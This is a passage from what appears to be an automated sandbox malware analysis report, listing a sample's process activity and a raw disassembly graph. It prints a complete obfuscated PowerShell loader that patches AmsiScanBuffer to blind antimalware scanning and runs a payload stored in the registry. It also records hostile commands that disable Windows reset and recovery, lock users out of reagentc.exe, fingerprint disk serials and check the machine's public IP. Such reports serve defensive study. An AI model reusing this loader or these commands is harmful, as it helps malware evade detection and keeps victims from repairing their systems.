tImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$kpBUoTRvoOegOC=$MoLktxqtnxyrW.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+'r'+'o'+'c'+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EtevswwRQwRAejVCuvR=EtrMmUyKmezi @([String])([IntPtr]);$JKiOnBfFNlGvOZPRImquAA=EtrMmUyKmezi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YdcUizEhLfa=$MoLktxqtnxyrW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$scwfUeOSfALItM=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$YdcUizEhLfa,[Object](''+'L'+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$OBgtMEtNHoxgskRxX=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$YdcUizEhLfa,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$CdwwlVp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scwfUeOSfALItM,$EtevswwRQwRAejVCuvR).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+'l');$TXsAOQOMQALSJtBsu=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$CdwwlVp,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$TBhmHaliuf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OBgtMEtNHoxgskRxX,$JKiOnBfFNlGvOZPRImquAA).Invoke($TXsAOQOMQALSJtBsu,[uint32]8,4,[ref]$TBhmHaliuf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TXsAOQOMQALSJtBsu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OBgtMEtNHoxgskRxX,$JKiOnBfFNlGvOZPRImquAA).Invoke($TXsAOQOMQALSJtBsu,[uint32]8,0x20,[ref]$TBhmHaliuf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+'L'+''+'M'+''+[Char](88)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                                                              Imagebase:0x7ff741d30000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:33
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:34
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:35
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:36
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\reg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
                                                              Imagebase:0x7ff67ae10000
                                                              File size:77'312 bytes
                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:38
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe"
                                                              Imagebase:0x7ff6f0210000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 53%, ReversingLabs
                                                              Has exited:true

                                                              General

                                                              Target ID:39
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:40
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:41
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\reg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
                                                              Imagebase:0x7ff67ae10000
                                                              File size:77'312 bytes
                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:42
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C takeown /f C:\Windows\System32\reagentc.exe
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:43
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:44
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\takeown.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:takeown /f C:\Windows\System32\reagentc.exe
                                                              Imagebase:0x7ff7cfff0000
                                                              File size:66'560 bytes
                                                              MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:45
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:F
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:46
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:47
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\icacls.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:icacls C:\Windows\System32\reagentc.exe /grant administrators:F
                                                              Imagebase:0x7ff73fdf0000
                                                              File size:39'424 bytes
                                                              MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:48
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:49
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:50
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\icacls.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
                                                              Imagebase:0x7ff73fdf0000
                                                              File size:39'424 bytes
                                                              MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:51
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wmic diskdrive get serialnumber
                                                              Imagebase:0x7ff7e30d0000
                                                              File size:576'000 bytes
                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:52
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:53
                                                              Start time:05:14:50
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\dllhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}
                                                              Imagebase:0x7ff7d8730000
                                                              File size:21'312 bytes
                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:54
                                                              Start time:05:14:50
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\winlogon.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:winlogon.exe
                                                              Imagebase:0x7ff6fc1b0000
                                                              File size:906'240 bytes
                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:55
                                                              Start time:05:14:51
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wmic diskdrive get serialnumber
                                                              Imagebase:0x7ff7e30d0000
                                                              File size:576'000 bytes
                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:56
                                                              Start time:05:14:51
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:57
                                                              Start time:05:14:51
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\lsass.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\lsass.exe
                                                              Imagebase:0x7ff6d9390000
                                                              File size:59'456 bytes
                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:58
                                                              Start time:05:14:52
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                              Imagebase:0x7ff7b4ee0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:59
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
                                                              Imagebase:0x7ff7d1630000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:60
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\curl.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:curl -s https://api.ipify.org
                                                              Imagebase:0x7ff60a790000
                                                              File size:530'944 bytes
                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:61
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\dwm.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"dwm.exe"
                                                              Imagebase:0x7ff74b010000
                                                              File size:94'720 bytes
                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:62
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:0.8%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:3.7%
                                                                Total number of Nodes:1390
                                                                Total number of Limit Nodes:2
                                                                execution_graph 8900 1f5a9691640 8901 1f5a968e830 69 API calls 8900->8901 8902 1f5a9691649 8901->8902 7491 1f5a9681bc0 7498 1f5a9681724 GetProcessHeap HeapAlloc 7491->7498 7493 1f5a9681bcf 7494 1f5a9681bd6 SleepEx 7493->7494 7497 1f5a968159c StrCmpIW StrCmpW 7493->7497 7549 1f5a96819b0 7493->7549 7495 1f5a9681724 50 API calls 7494->7495 7495->7493 7497->7493 7566 1f5a9681264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7498->7566 7500 1f5a968174c 7567 1f5a9681000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7500->7567 7502 1f5a9681754 7568 1f5a9681264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7502->7568 7504 1f5a968175d 7569 1f5a9681264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7504->7569 7506 1f5a9681766 7570 1f5a9681264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7506->7570 7508 1f5a968176f 7571 1f5a9681000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7508->7571 7510 1f5a9681778 7572 1f5a9681000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7510->7572 7512 1f5a9681781 7573 1f5a9681000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7512->7573 7514 1f5a968178a RegOpenKeyExW 7515 1f5a96819a2 7514->7515 7516 1f5a96817bc RegOpenKeyExW 7514->7516 7515->7493 7517 1f5a96817e5 7516->7517 7518 1f5a96817fb RegOpenKeyExW 7516->7518 7574 1f5a96812b8 RegQueryInfoKeyW 7517->7574 7520 1f5a968181f 7518->7520 7521 1f5a9681836 RegOpenKeyExW 7518->7521 7583 1f5a968104c RegQueryInfoKeyW 7520->7583 7524 1f5a9681871 RegOpenKeyExW 7521->7524 7525 1f5a968185a 7521->7525 7528 1f5a9681895 7524->7528 7529 1f5a96818ac RegOpenKeyExW 7524->7529 7527 1f5a96812b8 16 API calls 7525->7527 7532 1f5a9681867 RegCloseKey 7527->7532 7533 1f5a96812b8 16 API calls 7528->7533 7530 1f5a96818d0 7529->7530 7531 1f5a96818e7 RegOpenKeyExW 7529->7531 7535 1f5a96812b8 16 API calls 7530->7535 7536 1f5a9681922 RegOpenKeyExW 7531->7536 7537 1f5a968190b 7531->7537 7532->7524 7534 1f5a96818a2 RegCloseKey 7533->7534 7534->7529 7538 1f5a96818dd RegCloseKey 7535->7538 7540 1f5a968195d RegOpenKeyExW 7536->7540 7541 1f5a9681946 7536->7541 7539 1f5a968104c 6 API calls 7537->7539 7538->7531 7542 1f5a9681918 RegCloseKey 7539->7542 7544 1f5a9681981 7540->7544 7545 1f5a9681998 RegCloseKey 7540->7545 7543 1f5a968104c 6 API calls 7541->7543 7542->7536 7546 1f5a9681953 RegCloseKey 7543->7546 7547 1f5a968104c 6 API calls 7544->7547 7545->7515 7546->7540 7548 1f5a968198e RegCloseKey 7547->7548 7548->7545 7593 1f5a96814a0 7549->7593 7566->7500 7567->7502 7568->7504 7569->7506 7570->7508 7571->7510 7572->7512 7573->7514 7575 1f5a9681323 GetProcessHeap HeapAlloc 7574->7575 7576 1f5a9681486 RegCloseKey 7574->7576 7577 1f5a968134e RegEnumValueW 7575->7577 7578 1f5a9681472 GetProcessHeap HeapFree 7575->7578 7576->7518 7580 1f5a96813a1 7577->7580 7578->7576 7580->7577 7580->7578 7581 1f5a96813cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7580->7581 7582 1f5a968141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7580->7582 7588 1f5a9681530 7580->7588 7581->7582 7582->7580 7584 1f5a96811b5 RegCloseKey 7583->7584 7586 1f5a96810bf 7583->7586 7584->7521 7585 1f5a96810cf RegEnumValueW 7585->7586 7586->7584 7586->7585 7587 1f5a968114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7586->7587 7587->7586 7589 1f5a968154a 7588->7589 7590 1f5a9681580 7588->7590 7589->7590 7591 1f5a9681561 StrCmpIW 7589->7591 7592 1f5a9681569 StrCmpW 7589->7592 7590->7580 7591->7589 7592->7589 7594 1f5a96814e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7593->7594 7595 1f5a96814c2 GetProcessHeap HeapFree 7593->7595 7595->7594 7595->7595 8903 1f5a9682c40 8905 1f5a9682c94 8903->8905 8904 1f5a9682caf 8905->8904 8907 1f5a96835d0 8905->8907 8908 1f5a96835f5 8907->8908 8909 1f5a9683666 8907->8909 8908->8909 8910 1f5a9683d58 StrCmpNIW 8908->8910 8911 1f5a9681e04 StrCmpIW StrCmpW 8908->8911 8909->8904 8910->8908 8911->8908 8229 1f5a968ad42 8230 1f5a9689224 _CallSETranslator 9 API calls 8229->8230 8231 1f5a968ad4f __CxxCallCatchBlock 8230->8231 8232 1f5a968ad93 RaiseException 8231->8232 8233 1f5a968adba 8232->8233 8242 1f5a9689878 8233->8242 8235 1f5a968adeb __CxxCallCatchBlock 8236 1f5a9689224 _CallSETranslator 9 API calls 8235->8236 8237 1f5a968adfe 8236->8237 8239 1f5a9689224 _CallSETranslator 9 API calls 8237->8239 8241 1f5a968ae07 8239->8241 8243 1f5a9689224 _CallSETranslator 9 API calls 8242->8243 8244 1f5a968988a 8243->8244 8245 1f5a96898c5 8244->8245 8246 1f5a9689224 _CallSETranslator 9 API calls 8244->8246 8247 1f5a9689895 8246->8247 8247->8245 8248 1f5a9689224 _CallSETranslator 9 API calls 8247->8248 8249 1f5a96898b6 8248->8249 8249->8235 8250 1f5a9688ef8 8249->8250 8251 1f5a9689224 _CallSETranslator 9 API calls 8250->8251 8252 1f5a9688f06 8251->8252 8252->8235 8912 1f5a9688442 8913 1f5a9688fc0 __std_exception_copy 49 API calls 8912->8913 8914 1f5a968846d 8913->8914 8253 1f5a9685744 8254 1f5a968574a 8253->8254 8265 1f5a9687d70 8254->8265 8258 1f5a96857ae 8259 1f5a9685847 8259->8258 8262 1f5a96859cd 8259->8262 8278 1f5a9687950 8259->8278 8261 1f5a9685acb 8262->8261 8263 1f5a9685b47 VirtualProtect 8262->8263 8263->8258 8264 1f5a9685b73 GetLastError 8263->8264 8264->8258 8266 1f5a9687d7b 8265->8266 8267 1f5a968578d 8266->8267 8268 1f5a968b3fc __free_lconv_mon 2 API calls 8266->8268 8269 1f5a9687d9a 8266->8269 8267->8258 8274 1f5a96841d0 8267->8274 8268->8266 8270 1f5a9687da5 8269->8270 8284 1f5a9688588 8269->8284 8288 1f5a96885a8 8270->8288 8275 1f5a96841ed 8274->8275 8277 1f5a968425c 8275->8277 8297 1f5a9684440 8275->8297 8277->8259 8279 1f5a9687997 8278->8279 8322 1f5a9687720 8279->8322 8282 1f5a9687e40 _log10_special 8 API calls 8283 1f5a96879c1 8282->8283 8283->8259 8285 1f5a9688596 std::bad_alloc::bad_alloc 8284->8285 8292 1f5a9689078 8285->8292 8287 1f5a96885a7 8289 1f5a96885b6 std::bad_alloc::bad_alloc 8288->8289 8290 1f5a9689078 Concurrency::cancel_current_task 2 API calls 8289->8290 8291 1f5a9687dab 8290->8291 8293 1f5a9689097 8292->8293 8294 1f5a96890c0 RtlPcToFileHeader 8293->8294 8295 1f5a96890e2 RaiseException 8293->8295 8296 1f5a96890d8 8294->8296 8295->8287 8296->8295 8298 1f5a9684464 8297->8298 8303 1f5a9684487 8297->8303 8298->8303 8311 1f5a9683ef0 8298->8311 8299 1f5a96844ed 8302 1f5a9684523 8299->8302 8307 1f5a9683ef0 3 API calls 8299->8307 8300 1f5a96844bd 8300->8299 8305 1f5a9684020 2 API calls 8300->8305 8306 1f5a968453f 8302->8306 8308 1f5a9683ef0 3 API calls 8302->8308 8303->8300 8317 1f5a9684020 8303->8317 8305->8299 8309 1f5a968455b 8306->8309 8310 1f5a9684020 2 API calls 8306->8310 8307->8302 8308->8306 8309->8277 8310->8309 8312 1f5a9683f11 8311->8312 8313 1f5a9683f66 VirtualQuery 8312->8313 8314 1f5a9683f9a VirtualAlloc 8312->8314 8315 1f5a9683f80 8312->8315 8313->8312 8313->8315 8314->8315 8316 1f5a9683fcb GetLastError 8314->8316 8315->8303 8316->8312 8321 1f5a9684038 8317->8321 8318 1f5a96840a7 8318->8300 8319 1f5a968408d VirtualQuery 8319->8318 8319->8321 8320 1f5a96840f2 GetLastError 8320->8321 8321->8318 8321->8319 8321->8320 8323 1f5a968773b 8322->8323 8324 1f5a9687751 SetLastError 8323->8324 8325 1f5a968775f 8323->8325 8324->8325 8325->8282 8915 1f5a9691043 8916 1f5a9691050 8915->8916 8917 1f5a9691065 8916->8917 8919 1f5a969107e 8916->8919 8918 1f5a968d24c __free_lconv_mon 11 API calls 8917->8918 8920 1f5a969106a 8918->8920 8921 1f5a9691075 8919->8921 8923 1f5a968dd54 23 API calls 8919->8923 8922 1f5a968d110 _invalid_parameter_noinfo 49 API calls 8920->8922 8922->8921 8923->8921 8326 1f5a9693938 8327 1f5a969394f 8326->8327 8328 1f5a9693949 CloseHandle 8326->8328 8328->8327 8501 1f5a96953b8 8504 1f5a9688f4c 8501->8504 8505 1f5a9688f64 8504->8505 8506 1f5a9688f76 8504->8506 8505->8506 8507 1f5a9688f6c 8505->8507 8508 1f5a9689224 _CallSETranslator 9 API calls 8506->8508 8509 1f5a9688f74 8507->8509 8511 1f5a9689224 _CallSETranslator 9 API calls 8507->8511 8510 1f5a9688f7b 8508->8510 8510->8509 8513 1f5a9689224 